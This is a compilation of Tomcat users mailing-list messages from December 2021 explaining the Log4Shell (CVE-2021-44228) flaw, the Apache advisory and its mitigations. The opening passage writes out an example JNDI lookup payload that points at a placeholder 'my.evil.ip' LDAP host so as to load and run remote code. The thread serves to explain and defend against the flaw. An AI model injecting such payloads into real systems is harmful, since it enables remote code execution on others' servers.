an LDAP server. JNDI across the network is essentially the same thing as 
LDAP (or "Active Directory" if that's what you use... AD is LDAP). One 
of the things you can tell your JNDI lookup to do is load a .class file 
over the network and use it for $stuff.


4. Remember that evil RMI server we set up in #1 above? Well, unless you 
are filtering-out LDAP connections to random IPs (and, really, you 
*should be*), then I as an attacking user can just go to your 
application and search for


  "Hey buddy lol ${jndi:/lookup?name=ldap://my.evil.ip:port/EvilObject};

At this point, log4j will consider this string to log:

FYI User chris just searched for the search string Hey buddy lol 
${jndi:/lookup?name=ldap://my.evil.ip:port/EvilObject}


Oh, look, there's a magic "${jndi:" thing in there. Let's helpfully 
resolve that...


The JNDI lookup causes your server to reach-out to my.evil.ip, pull a 
reference for that class across the wire, then pull the class definition 
across the wire, and run the evil class code on your server.


At this point, the resulting string written to the log does make a bit 
of difference. The evil code has been loaded onto your server and you 
have a Bad Day.


Now, this can be mitigated in a number of ways, which is nice. My two 
favorite (and incomplete) ways to mitigate this are:


1. Don't allow outgoing LDAP connections from your server. In fact, it 
doesn't matter if they are LDAP or not. Don't allow outgoing connections 
from your servers except the required[1] ones.


2. Recent Java versions automatically disable remote-classloading via 
LDAP to prevent this kind of monkey business. But there are ways to make 
it work anyway.


This is why we can't have nice things.

RCE is bad m'kay, but let's say that you don't allow outgoing network 
connections AT ALL from your server, so you are TOTALLY IMMUNE from this 
kind of attack. Well, RCE ain't the only thing possible.


Data exfiltration is an often-overlooked attack that can still be pretty 
bad. It's "limited" to what can be found in/through JNDI but ... it's 
possible to find quite a bit of interesting information that way. How? 
Those log messages aren't being sent to the attacker! How can a logging 
leak give-

Re: log4j CVE general question

[Christopher Schultz]

Jon,

On 12/13/21 12:48, jonmcalexan...@wellsfargo.com.INVALID wrote:

I understand Chris. I guess I was looking to see if he had contact
info for anyone on that particular project. I know it's not like a
"company".

It's just like Tomcat: they have a public mailing list.

-chris

-Original Message-
From: Christopher Schultz 
Sent: Monday, December 13, 2021 11:39 AM
To: users@tomcat.apache.org
Subject: Re: log4j CVE general question

Jon,

On 12/13/21 11:51, jonmcalexan...@wellsfargo.com.INVALID wrote:

So, based on these entries on the log4j apache pages, I can't see that
any 1x product is vulnerable. Mark, is there some message from Apache
that we can share with those that need to know that for certain 1x
log4j is NOT vulnerable?

This is not something the Tomcat team (or Mark, individually) can really do
for you.

You should check for information from the log4j team.

Unofficially, log4j 1.x does not seem to be affected. There were some
questions about configuring it for use with a JMS appender, but it seems
those issues would be limited to having a compromised JMS server or an
injection into JNDI from another (unrelated) exploit.

-chris





News
CVE-2021-44228

The Log4j team has been made aware of a security vulnerability, CVE-2021-

44228, that has been addressed in Log4j 2.15.0.


Log4j's JNDI support has not restricted what names could be resolved.

Some protocols are unsafe or can allow remote code execution. Log4j now
limits the protocols by default to only java, ldap, and ldaps and limits the 
ldap
protocols to only accessing Java primitive objects by default served on the
local host.


One vector that allowed exposure to this vulnerability was Log4j's

allowance of Lookups to appear in log messages. As of Log4j 2.15.0 this
feature is now disabled by default. While an option has been provided to
enable Lookups in this fashion, users are strongly discouraged from enabling
it.


For those who cannot upgrade to 2.15.0, in releases >=2.10, this behavior

can be mitigated by setting either the system property
log4j2.formatMsgNoLookups or the environment variable
LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and
<=2.14.1, all PatternLayout patterns can be modified to specify the message
converter as %m{nolookups} instead of just %m. For releases >=2.0-beta9
and <=2.10.0, the mitigation is to remove the JndiLookup class from the
classpath: zip -q -d log4j-core-*.jar
org/apache/logging/log4j/core/lookup/JndiLookup.class.



Fixed in Log4j 2.15.0

CVE-2021-44228<https://urldefense.com/v3/__https://cve.mitre.org/cgi-

bin/cvename.cgi?name=CVE-2021-
44228__;!!F9svGWnIaVPGSwU!74bXJbpgx_hbZXhDbugIcTGP5lu3n4862EH5m
3nzPf6zeN_vbTWY0WIHuhFmP_EenqW0-rM$ >: Apache Log4j2 JNDI
features do not protect against attacker controlled LDAP and other JNDI
related endpoints.


Severity: Critical

Base CVSS Score: 10.0 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Versions Affected: all log4j-core versions >=2.0-beta9 and <=2.14.1

Descripton: Apache Log4j <=2.14.1 JNDI features used in configuration, log

messages, and parameters do not protect against attacker controlled LDAP
and other JNDI related endpoints. An attacker who can control log messages
or log message parameters can execute arbitrary code loaded from LDAP
servers when message lookup substitution is enabled. From log4j 2.15.0, this
behavior has been disabled by default.


Mitigation: In releases >=2.10, this behavior can be mitigated by setting

either the system property log4j2.formatMsgNoLookups or the environment
variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7
and <=2.14.1, all PatternLayout patterns can be modified to specify the
message converter as %m{nolookups} instead of just %m. For releases

=2.0-beta9 and <=2.10.0, the mitigation is to remove the JndiLookup class

from the classpath: zip -q -d log4j-core-*.jar
org/apache/logging/log4j/core/lookup/JndiLookup.class.


Credit: This issue was discovered by Chen Zhaojun of Alibaba Cloud Security

Team.


References:


https://urldefense.com/v3/__https://issues.apache.org/jira/browse/LOG4

J2-

3201__;!!F9svGWnIaVPGSwU!74bXJbpgx_hbZXhDbugIcTGP5lu3n4862EH5m3
nzPf

6zeN_vbTWY0WIHuhFmP_EezMJYN6o$  and


https://urldefense.com/v3/__https://issues.apache.org/jira/browse/LOG4

J2-

3198__;!!F9svGWnIaVPGSwU!74bXJbpgx_hbZXhDbugIcTGP5lu3n4862EH5m3
nzPf

6zeN_vbTWY0WIHuhFmP_EenSYqOaM$

Thanks,

Dream * Excel * Explore * Inspire
Jon McAlexander
Infrastructure Engineer
Asst Vice President

Middleware Product Engineering
Enterprise CIO | EAS | Middleware | Infrastructure Solutions

8080 Cobblestone Rd | Urbandale, IA 50322
MAC: F4469-010
Tel 515-988-2508 | Cell 515-988-2508



jonmcalexan...@wellsfargo.com<mailto:jonmcalexan...@wellsfargo.com>

This message may contain confidential and/or privileged information. If you

are not the addressee or authorized to receive this for the addressee, you
must not use, copy,

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[James H. H. Lampert]

On 12/13/21 10:53 AM, Mark Thomas wrote:

Log4j2 supports a log message format syntax that includes JNDI lookups.

Log4j2 processes log messages repeatedly until it doesn't find any more 
format strings. This means the output of one format string can insert a 
new format string.

. . .

Thanks. It's starting to make sense to me now, even given that much of 
it involves Java functionality I'd never heard of.


After re-reading the Veracode article in light of what you said, I then 
found a couple of Wikipedia articles that further clarify things, for me 
at least:


https://en.wikipedia.org/wiki/Log4j
https://en.wikipedia.org/wiki/Log4Shell

So it's the ability to resolve stuff of the general format 
"${prefix:name}" within a log string, that's the problem.


It's starting to reach a point where I can wrap my 59-year-old little 
grey cells around it.


--
JHHL

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Daniel Savard]

Le lun. 13 déc. 2021 à 14:11, Thomas Meyer  a écrit :

> Hi,
>
> Interesting. I know a bit off topic..
>
> Does it make a difference for the vulnerability if I log with:
>
> a) log.warn("log msg param {}", userControlledParam);
>
> Or
>
> b) log.warn(log msg param " + userControlledParam);
>
>
No.


> Mfg
> Thomas
>
>
-
Daniel Savard

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Thomas Meyer]

Hi,

Interesting. I know a bit off topic.. 

Does it make a difference for the vulnerability if I log with:

a) log.warn("log msg param {}", userControlledParam);

Or

b) log.warn(log msg param " + userControlledParam);

Mfg
Thomas

Am 13. Dezember 2021 19:53:04 MEZ schrieb Mark Thomas :
>On 13/12/2021 18:31, James H. H. Lampert wrote:
>> The thing I'm still utterly unclear about is how simply logging traffic 
>> could, by itself, create a vulnerability.
>> 
>> In our case, the log entries are not even viewable unless you are signed 
>> on to a command line session on the server (ssh for headless Linux; a 
>> physical Twinax terminal, or a 5250 emulator of some sort, for IBM 
>> Midrange).
>> 
>> How can a log entry be executed as a command, anyway?
>
>Log4j2 supports a log message format syntax that includes JNDI lookups.
>
>Log4j2 processes log messages repeatedly until it doesn't find any more 
>format strings. This means the output of one format string can insert a 
>new format string.
>
>So, if the application is logging some user provided string verbatim 
>then the user can do the following:
>- provide input that includes the log4j2 format string for a JNDI lookup
>- on the first iteration log4j2 builds the log message that includes
>   the user provided string
>- on the second iteration log4j processes the user provided format
>   string and performs a JNDI lookup
>
>For an example of how a JNDI lookup can be leveraged to trigger code 
>execution in Tomcat see this article:
>https://www.veracode.com/blog/research/exploiting-jndi-injections-java
>
>That isn't the only way to use JNDI to trigger code execution and I am 
>sure security researchers will find a bunch of new ways as a result of 
>this vulnerability.
>
>HTH,
>
>Mark
>
>-
>To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
>For additional commands, e-mail: users-h...@tomcat.apache.org
>

-- 
Diese Nachricht wurde von meinem Android-Gerät mit K-9 Mail gesendet.

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Mark Thomas]

On 13/12/2021 18:31, James H. H. Lampert wrote:
The thing I'm still utterly unclear about is how simply logging traffic 
could, by itself, create a vulnerability.


In our case, the log entries are not even viewable unless you are signed 
on to a command line session on the server (ssh for headless Linux; a 
physical Twinax terminal, or a 5250 emulator of some sort, for IBM 
Midrange).


How can a log entry be executed as a command, anyway?


Log4j2 supports a log message format syntax that includes JNDI lookups.

Log4j2 processes log messages repeatedly until it doesn't find any more 
format strings. This means the output of one format string can insert a 
new format string.


So, if the application is logging some user provided string verbatim 
then the user can do the following:

- provide input that includes the log4j2 format string for a JNDI lookup
- on the first iteration log4j2 builds the log message that includes
  the user provided string
- on the second iteration log4j processes the user provided format
  string and performs a JNDI lookup

For an example of how a JNDI lookup can be leveraged to trigger code 
execution in Tomcat see this article:

https://www.veracode.com/blog/research/exploiting-jndi-injections-java

That isn't the only way to use JNDI to trigger code execution and I am 
sure security researchers will find a bunch of new ways as a result of 
this vulnerability.


HTH,

Mark

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[James H. H. Lampert]

The thing I'm still utterly unclear about is how simply logging traffic 
could, by itself, create a vulnerability.


In our case, the log entries are not even viewable unless you are signed 
on to a command line session on the server (ssh for headless Linux; a 
physical Twinax terminal, or a 5250 emulator of some sort, for IBM 
Midrange).


How can a log entry be executed as a command, anyway?

--
JHHL

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: log4j CVE general question

[jonmcalexander]

Ok, so I have been given clearance to share the stance that we are taking with 
log4j. We have contacted Apache Security and are awaiting a response.

Before making a final decision around log4j 1.x, consider the following:

-Initially, 1.x wasn’t assessed for the vulnerability, because, it is end of 
life, so many points of guidance did not assess it and exclude it from their 
advisories.  
-The situation with 1.x is morphing, modifications to the payload may result in 
RCE or server-side lookups, there are also circumstances were 1.x is vulnerable:
-Log4j 1.x may be impacted by CVE-2021-44228 in a number of conditions, such as 
when the configuration uses JNDI, which may have been enabled.
-It's possible to use the 1.x Appender to load strings from a remote server. If 
you sent TopicBindingName or TopicConnectionFactoryBindingName to values that 
JDNI can handle, which is a configuration issue that needs to be investigated 
by teams using 1.x, but a lower priority than the risk of 2.x exploitation 
which is not configuration-dependent.
-Log4j .x is End of Life, and has other security vulnerabilities that will not 
be fixed, i.e (CVE-2019-17571) that should be assessed when judging their risk.

Our recommendation is to migrate from 1.x as a P2 priority, behind your 2.x 
patching efforts. Migration guide: 
https://logging.apache.org/log4j/2.x/manual/migration.html

Thanks. Just trying to help and practice good stewardship in the Tomcat 
community. :-D

Dream * Excel * Explore * Inspire
Jon McAlexander
Infrastructure Engineer
Asst Vice President

Middleware Product Engineering
Enterprise CIO | EAS | Middleware | Infrastructure Solutions

8080 Cobblestone Rd | Urbandale, IA 50322
MAC: F4469-010
Tel 515-988-2508 | Cell 515-988-2508

jonmcalexan...@wellsfargo.com
This message may contain confidential and/or privileged information. If you are 
not the addressee or authorized to receive this for the addressee, you must not 
use, copy, disclose, or take any action based on this message or any 
information herein. If you have received this message in error, please advise 
the sender immediately by reply e-mail and delete this message. Thank you for 
your cooperation.


> -Original Message-
> From: jonmcalexan...@wellsfargo.com.INVALID
> 
> Sent: Monday, December 13, 2021 11:48 AM
> To: users@tomcat.apache.org
> Subject: RE: log4j CVE general question
> 
> I understand Chris. I guess I was looking to see if he had contact info for
> anyone on that particular project. I know it's not like a "company".
> 
> Thanks though!
> 
> Dream * Excel * Explore * Inspire
> Jon McAlexander
> Infrastructure Engineer
> Asst Vice President
> 
> Middleware Product Engineering
> Enterprise CIO | EAS | Middleware | Infrastructure Solutions
> 
> 8080 Cobblestone Rd | Urbandale, IA 50322
> MAC: F4469-010
> Tel 515-988-2508 | Cell 515-988-2508
> 
> jonmcalexan...@wellsfargo.com
> This message may contain confidential and/or privileged information. If you
> are not the addressee or authorized to receive this for the addressee, you
> must not use, copy, disclose, or take any action based on this message or any
> information herein. If you have received this message in error, please advise
> the sender immediately by reply e-mail and delete this message. Thank you
> for your cooperation.
> 
> > -Original Message-
> > From: Christopher Schultz 
> > Sent: Monday, December 13, 2021 11:39 AM
> > To: users@tomcat.apache.org
> > Subject: Re: log4j CVE general question
> >
> > Jon,
> >
> > On 12/13/21 11:51, jonmcalexan...@wellsfargo.com.INVALID wrote:
> > > So, based on these entries on the log4j apache pages, I can't see
> > > that any 1x product is vulnerable. Mark, is there some message from
> > > Apache that we can share with those that need to know that for
> > > certain 1x log4j is NOT vulnerable?
> > This is not something the Tomcat team (or Mark, individually) can
> > really do for you.
> >
> > You should check for information from the log4j team.
> >
> > Unofficially, log4j 1.x does not seem to be affected. There were some
> > questions about configuring it for use with a JMS appender, but it
> > seems those issues would be limited to having a compromised JMS server
> > or an injection into JNDI from another (unrelated) exploit.
> >
> > -chris
> >
> >
> > >
> > >
> > > News
> > > CVE-2021-44228
> > >
> > > The Log4j team has been made aware of a security vulnerability,
> > > CVE-2021-
> > 44228, that has been addressed in Log4j 2.15.0.
> > >
> > > Log4j's JNDI support has not restricted what names could be resolved.
> > Some protocols are unsafe or can all

RE: log4j CVE general question

[jonmcalexander]

I understand Chris. I guess I was looking to see if he had contact info for 
anyone on that particular project. I know it's not like a "company". 

Thanks though!

Dream * Excel * Explore * Inspire
Jon McAlexander
Infrastructure Engineer
Asst Vice President

Middleware Product Engineering
Enterprise CIO | EAS | Middleware | Infrastructure Solutions

8080 Cobblestone Rd | Urbandale, IA 50322
MAC: F4469-010
Tel 515-988-2508 | Cell 515-988-2508

jonmcalexan...@wellsfargo.com
This message may contain confidential and/or privileged information. If you are 
not the addressee or authorized to receive this for the addressee, you must not 
use, copy, disclose, or take any action based on this message or any 
information herein. If you have received this message in error, please advise 
the sender immediately by reply e-mail and delete this message. Thank you for 
your cooperation.

> -Original Message-
> From: Christopher Schultz 
> Sent: Monday, December 13, 2021 11:39 AM
> To: users@tomcat.apache.org
> Subject: Re: log4j CVE general question
> 
> Jon,
> 
> On 12/13/21 11:51, jonmcalexan...@wellsfargo.com.INVALID wrote:
> > So, based on these entries on the log4j apache pages, I can't see that
> > any 1x product is vulnerable. Mark, is there some message from Apache
> > that we can share with those that need to know that for certain 1x
> > log4j is NOT vulnerable?
> This is not something the Tomcat team (or Mark, individually) can really do
> for you.
> 
> You should check for information from the log4j team.
> 
> Unofficially, log4j 1.x does not seem to be affected. There were some
> questions about configuring it for use with a JMS appender, but it seems
> those issues would be limited to having a compromised JMS server or an
> injection into JNDI from another (unrelated) exploit.
> 
> -chris
> 
> 
> >
> >
> > News
> > CVE-2021-44228
> >
> > The Log4j team has been made aware of a security vulnerability, CVE-2021-
> 44228, that has been addressed in Log4j 2.15.0.
> >
> > Log4j's JNDI support has not restricted what names could be resolved.
> Some protocols are unsafe or can allow remote code execution. Log4j now
> limits the protocols by default to only java, ldap, and ldaps and limits the 
> ldap
> protocols to only accessing Java primitive objects by default served on the
> local host.
> >
> > One vector that allowed exposure to this vulnerability was Log4j's
> allowance of Lookups to appear in log messages. As of Log4j 2.15.0 this
> feature is now disabled by default. While an option has been provided to
> enable Lookups in this fashion, users are strongly discouraged from enabling
> it.
> >
> > For those who cannot upgrade to 2.15.0, in releases >=2.10, this behavior
> can be mitigated by setting either the system property
> log4j2.formatMsgNoLookups or the environment variable
> LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and
> <=2.14.1, all PatternLayout patterns can be modified to specify the message
> converter as %m{nolookups} instead of just %m. For releases >=2.0-beta9
> and <=2.10.0, the mitigation is to remove the JndiLookup class from the
> classpath: zip -q -d log4j-core-*.jar
> org/apache/logging/log4j/core/lookup/JndiLookup.class.
> >
> >
> > Fixed in Log4j 2.15.0
> >
> > CVE-2021-44228<https://urldefense.com/v3/__https://cve.mitre.org/cgi-
> bin/cvename.cgi?name=CVE-2021-
> 44228__;!!F9svGWnIaVPGSwU!74bXJbpgx_hbZXhDbugIcTGP5lu3n4862EH5m
> 3nzPf6zeN_vbTWY0WIHuhFmP_EenqW0-rM$ >: Apache Log4j2 JNDI
> features do not protect against attacker controlled LDAP and other JNDI
> related endpoints.
> >
> > Severity: Critical
> >
> > Base CVSS Score: 10.0 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
> >
> > Versions Affected: all log4j-core versions >=2.0-beta9 and <=2.14.1
> >
> > Descripton: Apache Log4j <=2.14.1 JNDI features used in configuration, log
> messages, and parameters do not protect against attacker controlled LDAP
> and other JNDI related endpoints. An attacker who can control log messages
> or log message parameters can execute arbitrary code loaded from LDAP
> servers when message lookup substitution is enabled. From log4j 2.15.0, this
> behavior has been disabled by default.
> >
> > Mitigation: In releases >=2.10, this behavior can be mitigated by setting
> either the system property log4j2.formatMsgNoLookups or the environment
> variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7
> and <=2.14.1, all PatternLayout patterns can be modified to specify the
> message converter as %m{nolookups} instead of just %m. For releases
> >

Re: log4j CVE general question

[Christopher Schultz]

Jon,

On 12/13/21 11:51, jonmcalexan...@wellsfargo.com.INVALID wrote:

So, based on these entries on the log4j apache pages, I can't see
that any 1x product is vulnerable. Mark, is there some message from
Apache that we can share with those that need to know that for
certain 1x log4j is NOT vulnerable?
This is not something the Tomcat team (or Mark, individually) can really 
do for you.


You should check for information from the log4j team.

Unofficially, log4j 1.x does not seem to be affected. There were some 
questions about configuring it for use with a JMS appender, but it seems 
those issues would be limited to having a compromised JMS server or an 
injection into JNDI from another (unrelated) exploit.


-chris





News
CVE-2021-44228

The Log4j team has been made aware of a security vulnerability, CVE-2021-44228, 
that has been addressed in Log4j 2.15.0.

Log4j's JNDI support has not restricted what names could be resolved. Some 
protocols are unsafe or can allow remote code execution. Log4j now limits the 
protocols by default to only java, ldap, and ldaps and limits the ldap 
protocols to only accessing Java primitive objects by default served on the 
local host.

One vector that allowed exposure to this vulnerability was Log4j's allowance of 
Lookups to appear in log messages. As of Log4j 2.15.0 this feature is now 
disabled by default. While an option has been provided to enable Lookups in 
this fashion, users are strongly discouraged from enabling it.

For those who cannot upgrade to 2.15.0, in releases >=2.10, this behavior can be mitigated 
by setting either the system property log4j2.formatMsgNoLookups or the environment variable 
LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and <=2.14.1, all PatternLayout 
patterns can be modified to specify the message converter as %m{nolookups} instead of just %m. 
For releases >=2.0-beta9 and <=2.10.0, the mitigation is to remove the JndiLookup class 
from the classpath: zip -q -d log4j-core-*.jar 
org/apache/logging/log4j/core/lookup/JndiLookup.class.


Fixed in Log4j 2.15.0

CVE-2021-44228<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>: 
Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other 
JNDI related endpoints.

Severity: Critical

Base CVSS Score: 10.0 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Versions Affected: all log4j-core versions >=2.0-beta9 and <=2.14.1

Descripton: Apache Log4j <=2.14.1 JNDI features used in configuration, log 
messages, and parameters do not protect against attacker controlled LDAP and other 
JNDI related endpoints. An attacker who can control log messages or log message 
parameters can execute arbitrary code loaded from LDAP servers when message lookup 
substitution is enabled. From log4j 2.15.0, this behavior has been disabled by 
default.

Mitigation: In releases >=2.10, this behavior can be mitigated by setting either the system 
property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to 
true. For releases >=2.7 and <=2.14.1, all PatternLayout patterns can be modified to 
specify the message converter as %m{nolookups} instead of just %m. For releases >=2.0-beta9 
and <=2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q 
-d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

Credit: This issue was discovered by Chen Zhaojun of Alibaba Cloud Security 
Team.

References: https://issues.apache.org/jira/browse/LOG4J2-3201 and 
https://issues.apache.org/jira/browse/LOG4J2-3198

Thanks,

Dream * Excel * Explore * Inspire
Jon McAlexander
Infrastructure Engineer
Asst Vice President

Middleware Product Engineering
Enterprise CIO | EAS | Middleware | Infrastructure Solutions

8080 Cobblestone Rd | Urbandale, IA 50322
MAC: F4469-010
Tel 515-988-2508 | Cell 515-988-2508

jonmcalexan...@wellsfargo.com<mailto:jonmcalexan...@wellsfargo.com>
This message may contain confidential and/or privileged information. If you are 
not the addressee or authorized to receive this for the addressee, you must not 
use, copy, disclose, or take any action based on this message or any 
information herein. If you have received this message in error, please advise 
the sender immediately by reply e-mail and delete this message. Thank you for 
your cooperation.




-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

log4j CVE general question

[jonmcalexander]

So, based on these entries on the log4j apache pages, I can't see that any 1x 
product is vulnerable. Mark, is there some message from Apache that we can 
share with those that need to know that for certain 1x log4j is NOT vulnerable?


News
CVE-2021-44228

The Log4j team has been made aware of a security vulnerability, CVE-2021-44228, 
that has been addressed in Log4j 2.15.0.

Log4j's JNDI support has not restricted what names could be resolved. Some 
protocols are unsafe or can allow remote code execution. Log4j now limits the 
protocols by default to only java, ldap, and ldaps and limits the ldap 
protocols to only accessing Java primitive objects by default served on the 
local host.

One vector that allowed exposure to this vulnerability was Log4j's allowance of 
Lookups to appear in log messages. As of Log4j 2.15.0 this feature is now 
disabled by default. While an option has been provided to enable Lookups in 
this fashion, users are strongly discouraged from enabling it.

For those who cannot upgrade to 2.15.0, in releases >=2.10, this behavior can 
be mitigated by setting either the system property log4j2.formatMsgNoLookups or 
the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases 
>=2.7 and <=2.14.1, all PatternLayout patterns can be modified to specify the 
message converter as %m{nolookups} instead of just %m. For releases >=2.0-beta9 
and <=2.10.0, the mitigation is to remove the JndiLookup class from the 
classpath: zip -q -d log4j-core-*.jar 
org/apache/logging/log4j/core/lookup/JndiLookup.class.


Fixed in Log4j 2.15.0

CVE-2021-44228<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>: 
Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and 
other JNDI related endpoints.

Severity: Critical

Base CVSS Score: 10.0 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Versions Affected: all log4j-core versions >=2.0-beta9 and <=2.14.1

Descripton: Apache Log4j <=2.14.1 JNDI features used in configuration, log 
messages, and parameters do not protect against attacker controlled LDAP and 
other JNDI related endpoints. An attacker who can control log messages or log 
message parameters can execute arbitrary code loaded from LDAP servers when 
message lookup substitution is enabled. From log4j 2.15.0, this behavior has 
been disabled by default.

Mitigation: In releases >=2.10, this behavior can be mitigated by setting 
either the system property log4j2.formatMsgNoLookups or the environment 
variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and <=2.14.1, 
all PatternLayout patterns can be modified to specify the message converter as 
%m{nolookups} instead of just %m. For releases >=2.0-beta9 and <=2.10.0, the 
mitigation is to remove the JndiLookup class from the classpath: zip -q -d 
log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

Credit: This issue was discovered by Chen Zhaojun of Alibaba Cloud Security 
Team.

References: https://issues.apache.org/jira/browse/LOG4J2-3201 and 
https://issues.apache.org/jira/browse/LOG4J2-3198

Thanks,

Dream * Excel * Explore * Inspire
Jon McAlexander
Infrastructure Engineer
Asst Vice President

Middleware Product Engineering
Enterprise CIO | EAS | Middleware | Infrastructure Solutions

8080 Cobblestone Rd | Urbandale, IA 50322
MAC: F4469-010
Tel 515-988-2508 | Cell 515-988-2508

jonmcalexan...@wellsfargo.com<mailto:jonmcalexan...@wellsfargo.com>
This message may contain confidential and/or privileged information. If you are 
not the addressee or authorized to receive this for the addressee, you must not 
use, copy, disclose, or take any action based on this message or any 
information herein. If you have received this message in error, please advise 
the sender immediately by reply e-mail and delete this message. Thank you for 
your cooperation.

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Daniel Savard]

Thanks, very useful information to channel back to my team and beyond.
-
Daniel Savard

Re: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time Java version

[Juri Berlanda]

Hi all,

thanks a lot to all for the quick replies. Not what I hoped to hear, but 
hey - every new detail I learn about this issue turns out to be the 
opposite of what I hope to hear.


Cheers,

Juri

On 12/13/21 4:17 PM, David Weisgerber wrote:

Hi,
our software was also affected but luckily not our Tomcat distribution.
I repeat, no JRE has a sufficient mitigation! You need to update log4j2 or set 
the environment variables. The problem is that through log4j2 you can misuse 
other library functions where the JRE mitigations would not protect you. I must 
repeat, there was a website stating that the presence of tomcat alone would 
open up another attack vector through log4j2.

Best regards,
David

-Original Message-
From: Juri Berlanda 
Sent: Monday, 13 December 2021 16:03
To: users@tomcat.apache.org
Subject: Re: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time 
Java version

Hi,

we were affected - we use an AccessLogValve, which logs to Log4j2 and we use 
Log4j as java.util.logging LogManager. We already patched, but only on Saturday.

In any case: in a lot of places I saw "recent JRE versions have a mitigation in 
place", but I can't seem to find which JRE version introduced which mitigation. Can 
anybody here point me to where I can find that information? Googling for this only seems 
to bring up everybody's security advisories, but nobody seems to bother to state exact 
JRE versions.

Cheers,

Juri

On 12/13/21 2:13 PM, Christopher Schultz wrote:

Tim,

Adding to what others have posted...

On 12/13/21 03:57, Scott,Tim wrote:

Suspecting that someone here knows the answer immediately, I thought
I’d ask.

If you do not know the answer, please don’t spend any time
investigating: I’ll do that later today and update everyone whether
or not I find an answer.

Our security team advise that “Certain versions of the Java
Development Kit remove the LDAP attack vector”.

My question is: Does this removal occur during compile time or runtime?

Runtime. You can even re-enable the vulnerability if you want :)

It's worth repeating what David Weisgerber said in his reply: even if
the runtime JDK/JRE provides a mitigation of sorts, you may still be
vulnerable through other means (aka "JNDI gadgets").

There is also a risk of information leakage which does NOT rely on the
use of LDAP connections.

Your best course of action would be to upgrade log4j if possible, or
use one of the several other mitigations available for recent
versions. If you aren't running a recent version, RUN ONE.

-chris

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org



-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: [External] Re: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time Java version

[Scott,Tim]

> From: Juri Berlanda
> Sent: 13 December 2021 15:03
> Subject: [External] Re: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs 
> compile time Java version

> Hi,

> we were affected - we use an AccessLogValve, which logs to Log4j2 and we 
> use Log4j as java.util.logging LogManager. We already patched, but only 
> on Saturday.

> In any case: in a lot of places I saw "recent JRE versions have a 
> mitigation in place", but I can't seem to find which JRE version 
> introduced which mitigation. Can anybody here point me to where I can 
> find that information? Googling for this only seems to bring up 
> everybody's security advisories, but nobody seems to bother to state 
> exact JRE versions.

Our security team stated:

"Certain versions of the Java Development Kit remove the LDAP attack vector, 
but others remain. Versions after these JDKs remove the LDAP vector:
6u211
7u201
8u191
11.0.1"

No doubt you can review the release notes for, e.g., 8u191/192 for further 
clues.

Notwithstanding Mark's notes earlier that updating your JRE may not resolve 
everything.

> Cheers,
> Juri

Thanks,
Tim

RE: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time Java version

[David Weisgerber]

Hi,
our software was also affected but luckily not our Tomcat distribution.
I repeat, no JRE has a sufficient mitigation! You need to update log4j2 or set 
the environment variables. The problem is that through log4j2 you can misuse 
other library functions where the JRE mitigations would not protect you. I must 
repeat, there was a website stating that the presence of tomcat alone would 
open up another attack vector through log4j2.

Best regards,
David

-Original Message-
From: Juri Berlanda  
Sent: Monday, 13 December 2021 16:03
To: users@tomcat.apache.org
Subject: Re: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time 
Java version

Hi,

we were affected - we use an AccessLogValve, which logs to Log4j2 and we use 
Log4j as java.util.logging LogManager. We already patched, but only on Saturday.

In any case: in a lot of places I saw "recent JRE versions have a mitigation in 
place", but I can't seem to find which JRE version introduced which mitigation. 
Can anybody here point me to where I can find that information? Googling for 
this only seems to bring up everybody's security advisories, but nobody seems 
to bother to state exact JRE versions.

Cheers,

Juri

On 12/13/21 2:13 PM, Christopher Schultz wrote:
> Tim,
>
> Adding to what others have posted...
>
> On 12/13/21 03:57, Scott,Tim wrote:
